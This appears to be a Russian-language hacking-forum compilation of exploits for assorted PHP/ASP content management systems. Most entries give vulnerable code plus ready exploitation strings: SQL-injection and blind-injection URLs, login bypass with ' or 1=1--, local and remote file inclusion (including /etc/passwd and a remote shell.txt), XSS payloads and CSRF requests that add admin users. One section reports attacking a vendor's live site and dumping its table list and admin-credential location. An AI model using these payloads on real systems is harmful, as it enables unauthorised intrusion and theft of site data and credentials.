BLOX CMS BLOX CMS Сайт: http://blox.ru/ SQL-injection Уязвимый код: editPageParams.php PHP: . . . if (empty($_SESSION['page'])) $aa = $_GET['page']; else $aa = $_SESSION['page']; $U = LD($aa); . . . getPageParams.php PHP: function LD($NA) { . . . if (!empty($NA)) { $result = mysql_query( "SELECT * FROM ".C."pages WHERE id=$NA LIMIT 1"); . . . } Эксплуатация:
Так же у вышеуказанного скрипта есть уязвимость позволяющая попасть в админку без авторизации! В скрипте authenticate.php PHP: <?php include BLOXDIR."/inc/redirect.php"; RO(); function RO() { $O = $_POST['login']; $BM = $_POST['passwrd']; $TJ = false; if (!empty($O) && !empty($BM)) { $A = "SELECT permit FROM ".C."users WHERE login = '$O' AND passwrd = '$BM'"; if ($result = mysql_query($A)) { if ($row = mysql_fetch_assoc($result)) { if ('admin' == $O) $TJ = true; elseif (!empty($row['permit'])) $TJ = true; } } } if (!empty($TJ)) { $_SESSION['login'] = $O; if (isset($_POST['savePasswrd'])) { if (!empty($_POST['savePasswrd'])) { $V = array ($_POST['login'], $_POST['passwrd']); $NP = base64_encode(serialize($V)); if (setcookie('blox', "$NP", time() + 432000)); } else if (setcookie('blox', "", time() + 10)); } } } ?> В самом начале скпипта мы видим инклуд некого редерикт.пхп: Code: include BLOXDIR."/inc/redirect.php Смотрим его код: PHP: <?php KQ(); function KQ() { $BG = "?"; if (SID) $BG .= SID; header("Location: $BG"); } ?> Вроде ничего особенного, обычный редерикт, но после header("Location: $BG"); не указан die() or exit() , таким образом нас хоть и пересылает по адресу редерикта, но скрипт всё равно выполняется! Скачав прогу инеткряк или её аналог мы можем послать http запрос и попасть в админку!
BIGACE Download:http://downloads.sourceforge.net/bigace/bigace_2.5_RC2.zip POST: Code: <script type="text/javascript"> function changeURL(){ var URL = document.getElementById("site"); document.forms[0].action= URL.value; } </script> <form method="POST" id="target" action=""> Test site:<br> <input type="text" size="80" id="site" value="http://site.com/public/index.php?cmd=application&id=-1_tsearch_len"> <br><br>JavaScript to execute:<br> <textarea name="language" id="JScode" rows="5" cols="60">>"><script>alert(0);</script></textarea> <input type="submit" OnClick="changeURL()"> </form>
GENERAL-CMS Как они заявляют: Code: General-CMS - одна из ведущих систем управления сайтом в своей отрасли! Увы уязвимый код показать не смогу, так как двиг платный, а платить не хочется Возьмём офф сайт: http://www.cms-soft.ru/ И офигеем, за что они хотят от 800р до 3000р =// SQL INJECTION: 1) Code: http://www.cms-soft.ru/index.php?level1&levelid=18'+union+select+1,2,version()--+/index.php 2) Code: http://cms-soft.ru/cms/7'+union+select+1,2,version()--+/index.php Итак, что я вытянул: на сайте крутится 4 БД: Code: information_schema shop-imperial shop-imperial_affiliate shop-imperial_post из information_schema я вытащил названия таблиц, их там предостаточно: Code: cmssystemaddress cmssystemadmin cmssystemadrscom cmssystemcategories cmssystemcategoriesdop cmssystemcatshops cmssystemmetashops cmssystemonline cmssystemorder cmssystemordergoods cmssystempages cmssystempagesdop cmssystempassport cmssystemshops cmssystemusers demoadmin democategories democategoriesdop demometa demometadop demopages demopagesdop flashcat_backlinks flashcat_categories flashcat_conf flashcat_sites generalavtoaddress generalavtoadmin generalavtoadrscom generalavtocategories generalavtocategoriesdop generalavtocatshops generalavtometashops generalavtoonline generalavtoorder generalavtoordergoods generalavtopages generalavtopagesdop generalavtopassport generalavtoshops generalavtousers generalboardruaddress generalboardruadmin generalboardruadrscom generalboardruannouncements generalboardrucatboard generalboardrucategories generalboardrucategoriesdop generalboardrucatshops generalboardrumetaboard generalboardrumetashops generalboardruonline generalboardruorder generalboardruordergoods generalboardrupages generalboardrupagesdop generalboardrupassport generalboardrushops generalboardruusers generalcultureruaddress generalcultureruadmin generalcultureruadrscom generalcultureruannouncements generalculturerucatboard generalculturerucategories generalculturerucategoriesdop generalculturerucatshops generalculturerumetaboard generalculturerumetashops generalcultureruonline generalcultureruorder generalcultureruordergoods generalculturerupages generalculturerupagesdop generalculturerupassport generalculturerushops generalcultureruusers generalestatesruaddress generalestatesruadmin generalestatesruadrscom generalestatesruannouncements generalestatesrucatboard generalestatesrucategories generalestatesrucategoriesdop generalestatesrucatshops generalestatesrumetaboard generalestatesrumetashops generalestatesruonline generalestatesruorder generalestatesruordergoods generalestatesrupages generalestatesrupagesdop generalestatesrupassport generalestatesrushops generalestatesruusers generalhouseaddress generalhouseadmin generalhouseadrscom generalhouseannouncements generalhousecatboard generalhousecategories generalhousecategoriesdop generalhousecatshops generalhousemetaboard generalhousemetashops generalhouseonline generalhouseorder generalhouseordergoods generalhousepages generalhousepagesdop generalhousepassport generalhouseshops generalhouseusers generalpropertyruaddress generalpropertyruadmin generalpropertyruadrscom generalpropertyruannouncements generalpropertyrucatboard generalpropertyrucategories generalpropertyrucategoriesdop generalpropertyrucatshops generalpropertyrumetaboard generalpropertyrumetashops generalpropertyruonline generalpropertyruorder generalpropertyruordergoods generalpropertyrupages generalpropertyrupagesdop generalpropertyrupassport generalpropertyrushops generalpropertyruusers generalrealruaddress generalrealruadmin generalrealruadrscom generalrealruannouncements generalrealrucatboard generalrealrucategories generalrealrucategoriesdop generalrealrucatshops generalrealrumetaboard generalrealrumetashops generalrealruonline generalrealruorder generalrealruordergoods generalrealrupages generalrealrupagesdop generalrealrupassport generalrealrushops generalrealruusers generalscienceaddress generalscienceadmin generalscienceadrscom generalscienceannouncements generalsciencecatboard generalsciencecategories generalsciencecategoriesdop generalsciencecatshops generalsciencemetaboard generalsciencemetashops generalscienceonline generalscienceorder generalscienceordergoods generalsciencepages generalsciencepagesdop generalsciencepassport generalscienceshops generalscienceusers generaltourismaddress generaltourismadmin generaltourismadrscom generaltourismannouncements generaltourismcatboard generaltourismcategories generaltourismcategoriesdop generaltourismcatshops generaltourismmetaboard generaltourismmetashops generaltourismonline generaltourismorder generaltourismordergoods generaltourismpages generaltourismpagesdop generaltourismpassport generaltourismshops generaltourismusers importaddress importadmin importadrscom importcategories importcategoriesdop importcatshops importmetashops importonline importorder importordergoods importpages importpagesdop importpassport importshops importusers kirilladdress kirilladmin kirilladrscom kirillannouncements kirillcatboard kirillcategories kirillcategoriesdop kirillcatshops kirillmetaboard kirillmetashops kirillonline kirillorder kirillordergoods kirillpages kirillpagesdop kirillpassport kirillshops kirillusers pinaevaddress pinaevadmin pinaevadrscom pinaevannouncements pinaevcatboard pinaevcategories pinaevcategoriesdop pinaevcatshops pinaevmetaboard pinaevmetashops pinaevonline pinaevorder pinaevordergoods pinaevpages pinaevpagesdop pinaevpassport pinaevshops pinaevusers shopimperial2address shopimperial2admin shopimperial2adrscom shopimperial2categories shopimperial2categoriesdop shopimperial2catshops shopimperial2metashops shopimperial2online shopimperial2order shopimperial2ordergoods shopimperial2pages shopimperial2pagesdop shopimperial2passport shopimperial2shops shopimperial2users shopimperialadmin shopimperialcategories shopimperialcategoriesdop shopimperialmeta shopimperialmetadop shopimperialpages shopimperialpagesdop trastsoftaddress trastsoftadmin trastsoftadrscom trastsoftcategories trastsoftcategoriesdop trastsoftcatshops trastsoftmetashops trastsoftonline shopimperialmetadop shopimperialpages shopimperialpagesdop trastsoftaddress trastsoftadmin trastsoftadrscom trastsoftcategories trastsoftcategoriesdop trastsoftcatshops trastsoftmetashops trastsoftonline trastsoftorder trastsoftordergoods trastsoftpages trastsoftpagesdop trastsoftpassport trastsoftshops trastsoftusers traststroyaddress traststroyadmin traststroyadrscom traststroycategories traststroycategoriesdop traststroycatshops traststroymetashops traststroyonline traststroyorder traststroyordergoods traststroypages traststroypagesdop traststroypassport traststroyshops traststroyusers vall1address vall1admin vall1adrscom vall1categories vall1categoriesdop vall1catshops vall1metashops vall1online vall1order vall1ordergoods vall1pages vall1pagesdop vall1passport vall1shops vall1users vall3address vall3admin vall3adrscom vall3categories vall3categoriesdop vall3catshops vall3metashops vall3online vall3order vall3ordergoods vall3pages vall3pagesdop vall3passport vall3shops vall3users vogeanorgruaddress vogeanorgruadmin vogeanorgruadrscom vogeanorgruannouncements vogeanorgrucatboard vogeanorgrucatcompany vogeanorgrucategories vogeanorgrucategoriesdop vogeanorgrucatshops vogeanorgrufirms vogeanorgrumetaboard vogeanorgrumetacompany vogeanorgrumetashops vogeanorgruonline vogeanorgrupages vogeanorgrupagesdop vogeanorgrupassport vogeanorgrushops vogeanorgruusers vogeanruaddress vogeanruadmin vogeanruadrscom vogeanrucategories vogeanrucategoriesdop vogeanrucatshops vogeanrumeta vogeanrumetadop vogeanrumetashops vogeanruonline vogeanruorder vogeanruordergoods vogeanrupages vogeanrupagesdop vogeanrupassport vogeanrushops vogeanruusers generaladdress generaladmin generaladrscom generalannouncements generalcatboard generalcategories generalcategoriesdop generalcatshops generalmetaboard generalmetashops generalonline generalorder generalordergoods generalpages generalpagesdop generalpassport generalshops generalusers vogeanorgadmin vogeanorgcategories vogeanorgcategoriesdop vogeanorgmeta vogeanorgmetadop vogeanorgpages vogeanorgpagesdop antipolitikaaddress antipolitikaadmin antipolitikaadrscom antipolitikaannouncements antipolitikacatboard antipolitikacategories antipolitikacategoriesdop antipolitikacatshops antipolitikametaboard antipolitikametashops antipolitikaonline antipolitikaorder antipolitikaordergoods antipolitikapages antipolitikapagesdop antipolitikapassport antipolitikashops antipolitikausers articlesnetaddress articlesnetadmin articlesnetadrscom articlesnetannouncements articlesnetcatboard articlesnetcategories articlesnetcategoriesdop articlesnetcatshops articlesnetmetaboard articlesnetmetashops articlesnetonline articlesnetorder articlesnetordergoods articlesnetpages articlesnetpagesdop articlesnetpassport articlesnetshops articlesnetusers catalogmusicaddress catalogmusicadmin catalogmusicadrscom catalogmusicannouncements catalogmusiccatboard catalogmusiccategories catalogmusiccategoriesdop catalogmusiccatshops catalogmusicmetaboard catalogmusicmetashops catalogmusiconline catalogmusicorder catalogmusicordergoods catalogmusicpages catalogmusicpagesdop catalogmusicpassport catalogmusicshops catalogmusicusers demosaddress demosadmin demosadrscom demosannouncements demoscatboard demoscategories demoscategoriesdop demoscatshops demosmetaboard demosmetashops demosonline demosorder demosordergoods demospages demospagesdop demospassport demosshops de аки хранятся в таблице cmssystemadmin. Колонки: Code: id,login,password,name Удачи!
MagicSite CMS XSS В строке поиска <script>alert('Antichat')</script> Code: http://www.magicsite.ru/search.php?sword=%3Cscript%3Ealert%28%27Antichat%27%29%3C%2Fscript%3E&x=0&y=0 Одним запросом и XSS и раскрытие путей и скуль инжект не далеке На сервере у них magic_quotes=ON, так как даные слешируются! Code: http://www.magicsite.ru/search.php?sword=1' Вы искали: "1\'" Не далеко и скуль инжект! Админка: http://www.magicsite.ru/admin/ Но вход разршон с браузера Microsoft Internet Explorer версии 5.5 и выше! P.S.: Её продают за 24 505,00 р. =//
skillz CMS XSS В поле Поиск по сайту: "><script>alert(111)</script> Code: http://www.skillz.ru/index.php?search=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E&m=search
SOS Webpages SOS Webpages Сайт: http://www.soswebpages.com/ Табличка с логинами\хешами админов: hw_admin Дефолтовый префикс: sos_ SQL-injection Уязвимый код: photo.php PHP: . . . if (isset($_GET['photo_id'])) { $photo_id = mysql_real_escape_string($_GET['photo_id']); $sql = "SELECT * FROM " . $dbprefix . "photos WHERE photo_id=$photo_id"; $result=mysql_query($sql); . . . Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе Аналогично с переменной event_id в этом же скрипте PHP: . . . elseif (isset($_GET['event_id'])) { $event_id = mysql_real_escape_string($_GET['event_id']); . . . $sql = "SELECT * FROM " . $dbprefix . "events WHERE event_id=$event_id"; $result=mysql_query($sql); . . . Эксплуатация: Пример:
Уязвимости Pinpin Content 0.1 Beta Уязвимости Pinpin Content 0.1 Beta download: http://garbure.org/garbure/pinpin_content/pinpin-0.1-beta.tar.gz RFI(требования: register_globals=on) /pinpin/pinpin.php Уязвимость существует из-за отсутствия предварительного определения переменной $level_path, при непосредственном обращении к скрипту. уязвимый код: PHP: include "$level_path/pinpin/pinpin.conf.php"; эксплуатирование: Code: /pinpin/pinpin.php?level_path=http://site.com/shell.txt? (с) Iceangel_
Cifshanghai Script Download: http://www.cifshanghai.com/ Vuln File: new.php Exploit: Code: http://localhost/[path]/new.php?id=[SQL] POC:
Etomite CMS Blind Sql injection, чтения локальных файлов Производитель:http://www.etomite.org/ Продукт:Etomite CMS Версия:1.1 Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off): PHP: http://www.hsc.org/manager/actions/static/document_data.static.action.php?id=../../../../../includes/config.inc.php%00 Blind Sql injection Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)): PHP: $referer = urldecode($_SERVER['HTTP_REFERER']); if(empty($referer)) { $referer = "Unknown"; } else { $pieces = parse_url($referer); $referer = $pieces['scheme']."://".$pieces['host'].$pieces['path']; } ........................... $sql = "REPLACE INTO $tbl(id, data) VALUES('".$ref."', '".$referer."')";//206 пример реферера для blind: PHP: http://asdasdasdads.com/%27 or 1=IF(ASCII(SUBSTRING((SELECT username FROM etomite.etomite_manager_users where id = 1),1,1))>96,0,(select 1 union select 5)))--+ необходимо знать префикс и имя базы данных(без нее выпадаем в ошибку)
CuteNews CSRF: Code: http://localhost/cutenews/index.php POST /cutenews/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/cutenews/index.php?mod=editusers&action=list Cookie: lastusername=underwater; username=underwater; md5_password=xxx; Content-Type: application/x-www-form-urlencoded Content-Length: 128 regusername=underwater®password=_123456®nickname=underwater®email=underwater%40gmail.com®level=1&action=adduser&mod=editusers Code: http://localhost/cutenews/index.php?regusername=underwater®password=_123456®nickname=underwater®email=underwater%40gmail.com®level=1&action=adduser&mod=editusers Про шелл уже не стал писать:=\
Уязвимости Simple Ban download: http://boedesign.com/downloads/simpleban_v1.5.zip Blind SQL-injection(требования: magic_quotes=off) updatenote.php уязвимый код: PHP: $id = $_GET["fieldname"]; $note = $_GET["content"]; mysql_query("UPDATE notes SET note='$note' WHERE id='$id'") or die ("I could not insert"); эксплуатирование: Code: updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+ в случае истинности условия получаем небольшую задержку bypass(требования: magic_quotes=off) login.php уязвимый код: PHP: $user = $_POST['user']; $pass = $_POST['pass']; if($_POST['login']){ // QUERY ADMIN DATABASE $getlogin = "SELECT * FROM admin WHERE user='$user' and pass='$pass'"; $getlogin2 = mysql_query($getlogin); эксплуатирование: логинимся с именем: ' or 1=1-- (с) Iceangel_
LFI(требования: register_globals=on) /forums/profile.php Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд уязвимый код: PHP: define('IN_PHPBB', true); $phpbb_root_path = './'; include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); эксплуатирование: Code: /forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd (с) Iceangel_
Уязвимости Potato News 1.0.2 Уязвимости Potato News 1.0.2 download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip LFI (требования: register_globals=on) /timeago.php уязвимый код: PHP: if (file_exists("data/comments/$nid.ip.php")) { include("data/comments/$nid.ip.php"); эксплуатирование: Code: /timeago.php?nid=../../../../../../../../../../../../etc/passwd (с) Iceangel_
Программа: WebEyes Guest Book 3 Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mesajid» сценарием yorum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Эксплоит: http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects
Обзор уязвимостей sourcebans Sourcebans - комплекс банов на игровых серверах (если сервер есть в списке и ркон к нему подходит (не буду объяснять что такое ркон)) Офф сайт: sourcebans.net Статистика уязвимостей Всего уязвимостей найденно: 5 XSS: 3 MySql Error: 1 Плохая проверка данных: 1 1. ACTIVE XSS Уязвимая страница: sait.ru/index.php?p=submit Проблемный файл: pages/page.submit.php Уязвимые поля: Comments/Комменты, Players IP/Айпи игроков, STEAM_ID Описание: Подставляем в уязв. поля алерт, и он срабатывает у админа если он зайдет в bans (управление банами) Минус что если по почте придет отчет что бан добавлен то будут детали бана в письме и так пропалят xss Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.5 (включительно 1.4.5) 2.ACTIVE XSS 2 Уязвимая страница: sait.ru/index.php Проблемный файл: Точно не известно Уязвимые поля: Intro Title Описание: В случае если вы потеряли взломанный аккаунт то его можно контролировать если вы заранее подставили скрипт на сниффер в поле "Intro Title" но опять таки админ может пропалить Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.2 (включительно 1.4.2)(скорее всего и в 1.4.3 так как прикрывают токо паблик уязвимости(сам не тестил в версии 1.4.3/1.4.4/1.4.5))(указанные баги найденны за 3 дня и в паблике не обнаруживались) 3.ACTIVE XSS 3 Уязвимая страница: sait.ru/index.php?p=admin&c=mods Проблемный файл: pages/admin.edit.mod.php Уязвимые поля: Mod Name, Mod Folder Описание: Не достаточная обработка входных данных, в связи с этим возможна ACTIVE XSS в выводе модов а так же в выводе серверов в админке! Можно использовать как бекдор для в случае если аккаунт потерян Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.5 (включительно 1.4.5) 4. MySql Error Уязвимая страница: sait.ru/index.php?p=submit Проблемный файл: pages/page.submit.php Уязвимые параметры: <select id="server" name="server"> в выборе серверов, сам параметр value Описание: Описания нету Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.5 (включительно 1.4.5) 5. Не достаточная проверка данных Уязвимая страница: sait.ru/index.php Проблемный файл: includes/sb-callback.php Уязвимые параметры: отсуствуют Описание: Не достаточная обработка при смене емаила Ничего не проверяется, следовательно можно получить полный доступ сменив емаил админа (поменяв ID админа в параметре поста xajaxargs[]) Для того чтобы сменить емаил удаленно просто надо поснифать http пакеты на локальном хосте (когда меняем емаил) и отправить их на указанный адрес в интернете (где расположен двиг. sourcebans) Автор уязвимости: Mr. Anonymous Версии: во всех версиях до 1.4.2 (включительно 1.4.2) На этом у меня все, в следующем обзоре уязв. sourcebans попробую рассказать про заливку шелла и про многие другие уязвимости этого движка
phpBMS v0.96 половина скриптов в дирах Code: phpBMS v0.96 phpbms.org eLwaux(c)2009, uasc.org.ua http://phpbms.org/trial/ ## ## ## SQL Inj ----------------------------------------------------------------------------------------------- $querystatement="SELECT if(discounts.type+0=1,concat(discounts.value,\"%\"),discounts.value) AS value FROM discounts WHERE id=".$_GET["id"]; $queryresult = $db->query($querystatement); ----------------------------------------------------------------------------------------------- PoC: /modules/bms/invoices_discount_ajax.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()) ## ## ## SQL Inj \dbgraphic.php ----------------------------------------------------------------------------------------------- $querystatement="SELECT ".$_GET["f"].",".$_GET["mf"]." FROM ".$_GET["t"]." WHERE id=".$_GET["r"]; $queryresult=$db->query($querystatement); ----------------------------------------------------------------------------------------------- PoC: \dbgraphic.php?f=concat_ws(id,login,password)&mf=1&t=users&r=1 ## ## ## SQL Inj ----------------------------------------------------------------------------------------------- if(isset($_GET["cmd"])){ switch($_GET["cmd"]){ case "show": showSearch($_GET["tid"],$_GET["base"],$db); break; }//end switch ----------------------------------------------------------------------------------------------- PoC: /advancedsearch.php?cmd=show&tid=-1+union+select+login+from+users&base=2 /advancedsearch.php?cmd=show&tid=-1+union+select+password+from+users&base=2 ## ## ## pXSS ----------------------------------------------------------------------------------------------- <form name="form1" method="post" action="<?php echo $_SERVER["PHP_SELF"]?>"> ----------------------------------------------------------------------------------------------- PoC: \index.php/"><script>alert(/xss/);</script><div id=" \modules\base\myaccount.php/"><script>alert(/xss/);</script><div id=" \phpbms\modules\base\modules_view.php"><script>alert(/xss/);</script><div id=" \phpbms\modules\base\tabledefs_options.php\">{XSS} \phpbms\modules\base\adminsettings.php\">{XSS} ## ## ## Path Disclosure /footer.php /header.php /advancedsearch.php?cmd=show& /choicelist.php
GenCMS Code: GenCMS http://gencms.berlios.de/ eLwaux(c)2009 LFI /show.php ---------------------------------------------------------------------------------------------------- 18: $param = $_GET['p']; 19: if(empty($param)) $param = 'news'; 20: //get right page 21: //$page = $param.'.php'; 22: 23: //static or dynamic 24: if(GC_FULLSTATIC) 25: { 26: $page = $param.'.htm'; 27: staticpage($page); 28: } 29: else 30: { 31: $page = GC_IPATH.'_base/sites/'.$param.'.php'; 32: dynamicpage($page); 33: } ---------------------------------------------------------------------------------------------------- PoC: /show.php?p=../../{FILE.PHP}%00 LFI /admin/pages/SiteNew.php ---------------------------------------------------------------------------------------------------- 14: if(!empty($_GET['step'])) $Step = $_GET['step']; 23: if ($Step == "2") 24: { 25: // allgemeine settings 26: //include blocks from template config 27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php'); 28: $TPLBlocks = explode(';',$TemplateSettings); 29: } ---------------------------------------------------------------------------------------------------- PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )
SqliteAdmin CSRF Code: http://site/sqlitemanager/main.php?dbsel=1 POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1 Host: 190.161.4.211 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3, Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://site/sqlitemanager/main.php?dbsel=1&function=IF&action=modify Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx Content-Type: application/x-www-form-urlencoded Content-Length: 332 FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save